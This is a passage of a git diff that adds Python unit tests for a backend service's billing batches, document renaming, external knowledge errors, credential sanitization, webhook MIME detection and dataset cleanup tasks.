str: diff --git a/api/tests/unit_tests/oss/opendal/test_opendal.py b/api/tests/unit_tests/oss/opendal/test_opendal.py index 2496aabbce..b83ad72b34 100644 --- a/api/tests/unit_tests/oss/opendal/test_opendal.py +++ b/api/tests/unit_tests/oss/opendal/test_opendal.py @@ -21,20 +21,16 @@ class TestOpenDAL: ) @pytest.fixture(scope="class", autouse=True) - def teardown_class(self, request): + def teardown_class(self): """Clean up after all tests in the class.""" - def cleanup(): - folder = Path(get_opendal_bucket()) - if folder.exists() and folder.is_dir(): - for item in folder.iterdir(): - if item.is_file(): - item.unlink() - elif item.is_dir(): - item.rmdir() - folder.rmdir() + yield - return cleanup() + folder = Path(get_opendal_bucket()) + if folder.exists() and folder.is_dir(): + import shutil + + shutil.rmtree(folder, ignore_errors=True) def test_save_and_exists(self): """Test saving data and checking existence.""" diff --git a/api/tests/unit_tests/services/test_billing_service.py b/api/tests/unit_tests/services/test_billing_service.py index 915aee3fa7..f50f744a75 100644 --- a/api/tests/unit_tests/services/test_billing_service.py +++ b/api/tests/unit_tests/services/test_billing_service.py @@ -1156,6 +1156,199 @@ class TestBillingServiceEdgeCases: assert "Only team owner or team admin can perform this action" in str(exc_info.value) +class TestBillingServiceSubscriptionOperations: + """Unit tests for subscription operations in BillingService. + + Tests cover: + - Bulk plan retrieval with chunking + - Expired subscription cleanup whitelist retrieval + """ + + @pytest.fixture + def mock_send_request(self): + """Mock _send_request method.""" + with patch.object(BillingService, "_send_request") as mock: + yield mock + + def test_get_plan_bulk_with_empty_list(self, mock_send_request): + """Test bulk plan retrieval with empty tenant list.""" + # Arrange + tenant_ids = [] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + mock_send_request.assert_not_called() + + def test_get_plan_bulk_with_chunking(self, mock_send_request): + """Test bulk plan retrieval with more than 200 tenants (chunking logic).""" + # Arrange - 250 tenants to test chunking (chunk_size = 200) + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk: tenants 0-199 + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk: tenants 200-249 + second_chunk_response = { + "data": {f"tenant-{i}": {"plan": "professional", "expiration_date": 1767225600} for i in range(200, 250)} + } + + mock_send_request.side_effect = [first_chunk_response, second_chunk_response] + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 250 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert result["tenant-200"]["plan"] == "professional" + assert result["tenant-249"]["plan"] == "professional" + assert mock_send_request.call_count == 2 + + # Verify first chunk call + first_call = mock_send_request.call_args_list[0] + assert first_call[0][0] == "POST" + assert first_call[0][1] == "/subscription/plan/batch" + assert len(first_call[1]["json"]["tenant_ids"]) == 200 + + # Verify second chunk call + second_call = mock_send_request.call_args_list[1] + assert len(second_call[1]["json"]["tenant_ids"]) == 50 + + def test_get_plan_bulk_with_partial_batch_failure(self, mock_send_request): + """Test bulk plan retrieval when 
one batch fails but others succeed.""" + # Arrange - 250 tenants, second batch will fail + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # First chunk succeeds + first_chunk_response = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Second chunk fails - need to create a mock that raises when called + def side_effect_func(*args, **kwargs): + if mock_send_request.call_count == 1: + return first_chunk_response + else: + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should only have data from first batch + assert len(result) == 200 + assert result["tenant-0"]["plan"] == "sandbox" + assert result["tenant-199"]["plan"] == "sandbox" + assert "tenant-200" not in result + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_all_batches_failing(self, mock_send_request): + """Test bulk plan retrieval when all batches fail.""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(250)] + + # All chunks fail + def side_effect_func(*args, **kwargs): + raise ValueError("API error") + + mock_send_request.side_effect = side_effect_func + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert - should return empty dict + assert result == {} + assert mock_send_request.call_count == 2 + + def test_get_plan_bulk_with_exactly_200_tenants(self, mock_send_request): + """Test bulk plan retrieval with exactly 200 tenants (boundary condition).""" + # Arrange + tenant_ids = [f"tenant-{i}" for i in range(200)] + mock_send_request.return_value = { + "data": {f"tenant-{i}": {"plan": "sandbox", "expiration_date": 1735689600} for i in range(200)} + } + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert len(result) == 200 + assert mock_send_request.call_count == 1 + + def test_get_plan_bulk_with_empty_data_response(self, mock_send_request): + """Test bulk plan retrieval with empty data in response.""" + # Arrange + tenant_ids = ["tenant-1", "tenant-2"] + mock_send_request.return_value = {"data": {}} + + # Act + result = BillingService.get_plan_bulk(tenant_ids) + + # Assert + assert result == {} + + def test_get_expired_subscription_cleanup_whitelist_success(self, mock_send_request): + """Test successful retrieval of expired subscription cleanup whitelist.""" + # Arrange + api_response = [ + { + "created_at": "2025-10-16T01:56:17", + "tenant_id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", + "contact": "example@dify.ai", + "id": "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe5", + "expired_at": "2026-01-01T01:56:17", + "updated_at": "2025-10-16T01:56:17", + }, + { + "created_at": "2025-10-16T02:00:00", + "tenant_id": "tenant-2", + "contact": "test@example.com", + "id": "whitelist-id-2", + "expired_at": "2026-02-01T00:00:00", + "updated_at": "2025-10-16T02:00:00", + }, + { + "created_at": "2025-10-16T03:00:00", + "tenant_id": "tenant-3", + "contact": "another@example.com", + "id": "whitelist-id-3", + "expired_at": "2026-03-01T00:00:00", + "updated_at": "2025-10-16T03:00:00", + }, + ] + mock_send_request.return_value = {"data": api_response} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert - should return only tenant_ids + assert result == ["36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6", "tenant-2", "tenant-3"] + assert len(result) == 3 + assert result[0] == "36bd55ec-2ea9-4d75-a9ea-1f26aeb4ffe6" + assert result[1] == "tenant-2" + assert result[2] == 
"tenant-3" + mock_send_request.assert_called_once_with("GET", "/subscription/cleanup/whitelist") + + def test_get_expired_subscription_cleanup_whitelist_empty_list(self, mock_send_request): + """Test retrieval of empty cleanup whitelist.""" + # Arrange + mock_send_request.return_value = {"data": []} + + # Act + result = BillingService.get_expired_subscription_cleanup_whitelist() + + # Assert + assert result == [] + assert len(result) == 0 + + class TestBillingServiceIntegrationScenarios: """Integration-style tests simulating real-world usage scenarios. diff --git a/api/tests/unit_tests/services/test_document_service_rename_document.py b/api/tests/unit_tests/services/test_document_service_rename_document.py new file mode 100644 index 0000000000..94850ecb09 --- /dev/null +++ b/api/tests/unit_tests/services/test_document_service_rename_document.py @@ -0,0 +1,176 @@ +from types import SimpleNamespace +from unittest.mock import Mock, create_autospec, patch + +import pytest + +from models import Account +from services.dataset_service import DocumentService + + +@pytest.fixture +def mock_env(): + """Patch dependencies used by DocumentService.rename_document. + + Mocks: + - DatasetService.get_dataset + - DocumentService.get_document + - current_user (with current_tenant_id) + - db.session + """ + with ( + patch("services.dataset_service.DatasetService.get_dataset") as get_dataset, + patch("services.dataset_service.DocumentService.get_document") as get_document, + patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user, + patch("extensions.ext_database.db.session") as db_session, + ): + current_user.current_tenant_id = "tenant-123" + yield { + "get_dataset": get_dataset, + "get_document": get_document, + "current_user": current_user, + "db_session": db_session, + } + + +def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False): + return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled) + + +def make_document( + document_id="document-123", + dataset_id="dataset-123", + tenant_id="tenant-123", + name="Old Name", + data_source_info=None, + doc_metadata=None, +): + doc = Mock() + doc.id = document_id + doc.dataset_id = dataset_id + doc.tenant_id = tenant_id + doc.name = name + doc.data_source_info = data_source_info or {} + # property-like usage in code relies on a dict + doc.data_source_info_dict = dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + 
mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") diff --git a/api/tests/unit_tests/services/test_external_dataset_service.py b/api/tests/unit_tests/services/test_external_dataset_service.py index c12ea2f7cb..e2d62583f8 100644 --- a/api/tests/unit_tests/services/test_external_dataset_service.py +++ b/api/tests/unit_tests/services/test_external_dataset_service.py @@ -6,6 +6,7 @@ Target: 1500+ lines of comprehensive test coverage. 
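+This revision also covers the changed error path: non-200 responses from the
+external knowledge API now raise an exception carrying the response text,
+instead of silently returning an empty list.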
""" import json +import re from datetime import datetime from unittest.mock import MagicMock, Mock, patch @@ -1791,8 +1792,8 @@ class TestExternalDatasetServiceFetchRetrieval: @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") @patch("services.external_knowledge_service.db") - def test_fetch_external_knowledge_retrieval_non_200_status(self, mock_db, mock_process, factory): - """Test retrieval returns empty list on non-200 status.""" + def test_fetch_external_knowledge_retrieval_non_200_status_raises_exception(self, mock_db, mock_process, factory): + """Test that non-200 status code raises Exception with response text.""" # Arrange binding = factory.create_external_knowledge_binding_mock() api = factory.create_external_knowledge_api_mock() @@ -1817,12 +1818,103 @@ class TestExternalDatasetServiceFetchRetrieval: mock_response = MagicMock() mock_response.status_code = 500 + mock_response.text = "Internal Server Error: Database connection failed" mock_process.return_value = mock_response - # Act - result = ExternalDatasetService.fetch_external_knowledge_retrieval( - "tenant-123", "dataset-123", "query", {"top_k": 5} - ) + # Act & Assert + with pytest.raises(Exception, match="Internal Server Error: Database connection failed"): + ExternalDatasetService.fetch_external_knowledge_retrieval( + "tenant-123", "dataset-123", "query", {"top_k": 5} + ) - # Assert - assert result == [] + @pytest.mark.parametrize( + ("status_code", "error_message"), + [ + (400, "Bad Request: Invalid query parameters"), + (401, "Unauthorized: Invalid API key"), + (403, "Forbidden: Access denied to resource"), + (404, "Not Found: Knowledge base not found"), + (429, "Too Many Requests: Rate limit exceeded"), + (500, "Internal Server Error: Database connection failed"), + (502, "Bad Gateway: External service unavailable"), + (503, "Service Unavailable: Maintenance mode"), + ], + ) + @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") + @patch("services.external_knowledge_service.db") + def test_fetch_external_knowledge_retrieval_various_error_status_codes( + self, mock_db, mock_process, factory, status_code, error_message + ): + """Test that various error status codes raise exceptions with response text.""" + # Arrange + tenant_id = "tenant-123" + dataset_id = "dataset-123" + + binding = factory.create_external_knowledge_binding_mock( + dataset_id=dataset_id, external_knowledge_api_id="api-123" + ) + api = factory.create_external_knowledge_api_mock(api_id="api-123") + + mock_binding_query = MagicMock() + mock_api_query = MagicMock() + + def query_side_effect(model): + if model == ExternalKnowledgeBindings: + return mock_binding_query + elif model == ExternalKnowledgeApis: + return mock_api_query + return MagicMock() + + mock_db.session.query.side_effect = query_side_effect + + mock_binding_query.filter_by.return_value = mock_binding_query + mock_binding_query.first.return_value = binding + + mock_api_query.filter_by.return_value = mock_api_query + mock_api_query.first.return_value = api + + mock_response = MagicMock() + mock_response.status_code = status_code + mock_response.text = error_message + mock_process.return_value = mock_response + + # Act & Assert + with pytest.raises(ValueError, match=re.escape(error_message)): + ExternalDatasetService.fetch_external_knowledge_retrieval(tenant_id, dataset_id, "query", {"top_k": 5}) + + @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") + 
@patch("services.external_knowledge_service.db") + def test_fetch_external_knowledge_retrieval_empty_response_text(self, mock_db, mock_process, factory): + """Test exception with empty response text.""" + # Arrange + binding = factory.create_external_knowledge_binding_mock() + api = factory.create_external_knowledge_api_mock() + + mock_binding_query = MagicMock() + mock_api_query = MagicMock() + + def query_side_effect(model): + if model == ExternalKnowledgeBindings: + return mock_binding_query + elif model == ExternalKnowledgeApis: + return mock_api_query + return MagicMock() + + mock_db.session.query.side_effect = query_side_effect + + mock_binding_query.filter_by.return_value = mock_binding_query + mock_binding_query.first.return_value = binding + + mock_api_query.filter_by.return_value = mock_api_query + mock_api_query.first.return_value = api + + mock_response = MagicMock() + mock_response.status_code = 503 + mock_response.text = "" + mock_process.return_value = mock_response + + # Act & Assert + with pytest.raises(Exception, match=""): + ExternalDatasetService.fetch_external_knowledge_retrieval( + "tenant-123", "dataset-123", "query", {"top_k": 5} + ) diff --git a/api/tests/unit_tests/services/test_model_provider_service_sanitization.py b/api/tests/unit_tests/services/test_model_provider_service_sanitization.py new file mode 100644 index 0000000000..9a107da1c7 --- /dev/null +++ b/api/tests/unit_tests/services/test_model_provider_service_sanitization.py @@ -0,0 +1,88 @@ +import types + +import pytest + +from core.entities.provider_entities import CredentialConfiguration, CustomModelConfiguration +from core.model_runtime.entities.common_entities import I18nObject +from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.provider_entities import ConfigurateMethod +from models.provider import ProviderType +from services.model_provider_service import ModelProviderService + + +class _FakeConfigurations: + def __init__(self, provider_configuration: types.SimpleNamespace) -> None: + self._provider_configuration = provider_configuration + + def values(self) -> list[types.SimpleNamespace]: + return [self._provider_configuration] + + +@pytest.fixture +def service_with_fake_configurations(): + # Build a fake provider schema with minimal fields used by ProviderResponse + fake_provider = types.SimpleNamespace( + provider="langgenius/openai_api_compatible/openai_api_compatible", + label=I18nObject(en_US="OpenAI API Compatible", zh_Hans="OpenAI API Compatible"), + description=None, + icon_small=None, + icon_small_dark=None, + icon_large=None, + background=None, + help=None, + supported_model_types=[ModelType.LLM], + configurate_methods=[ConfigurateMethod.CUSTOMIZABLE_MODEL], + provider_credential_schema=None, + model_credential_schema=None, + ) + + # Include decrypted credentials to simulate the leak source + custom_model = CustomModelConfiguration( + model="gpt-4o-mini", + model_type=ModelType.LLM, + credentials={"api_key": "sk-plain-text", "endpoint": "https://example.com"}, + current_credential_id="cred-1", + current_credential_name="API KEY 1", + available_model_credentials=[], + unadded_to_model_list=False, + ) + + fake_custom_provider = types.SimpleNamespace( + current_credential_id="cred-1", + current_credential_name="API KEY 1", + available_credentials=[CredentialConfiguration(credential_id="cred-1", credential_name="API KEY 1")], + ) + + fake_custom_configuration = types.SimpleNamespace( + provider=fake_custom_provider, models=[custom_model], 
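+        # can_added_models stays empty here: the fake provider exposes a
+        # single, already-configured custom model.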
can_added_models=[] + ) + + fake_system_configuration = types.SimpleNamespace(enabled=False, current_quota_type=None, quota_configurations=[]) + + fake_provider_configuration = types.SimpleNamespace( + provider=fake_provider, + preferred_provider_type=ProviderType.CUSTOM, + custom_configuration=fake_custom_configuration, + system_configuration=fake_system_configuration, + is_custom_configuration_available=lambda: True, + ) + + class _FakeProviderManager: + def get_configurations(self, tenant_id: str) -> _FakeConfigurations: + return _FakeConfigurations(fake_provider_configuration) + + svc = ModelProviderService() + svc.provider_manager = _FakeProviderManager() + return svc + + +def test_get_provider_list_strips_credentials(service_with_fake_configurations: ModelProviderService): + providers = service_with_fake_configurations.get_provider_list(tenant_id="tenant-1", model_type=None) + + assert len(providers) == 1 + custom_models = providers[0].custom_configuration.custom_models + + assert custom_models is not None + assert len(custom_models) == 1 + # The sanitizer should drop credentials in list response + assert custom_models[0].credentials is None diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file + assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" diff --git 
a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) 
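+        # Expected behavior: the service swallows MagicException, logs it at
+        # debug level, and falls back to the generic application/octet-stream.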
+ + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = 
str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. 
+ + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) + assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. 
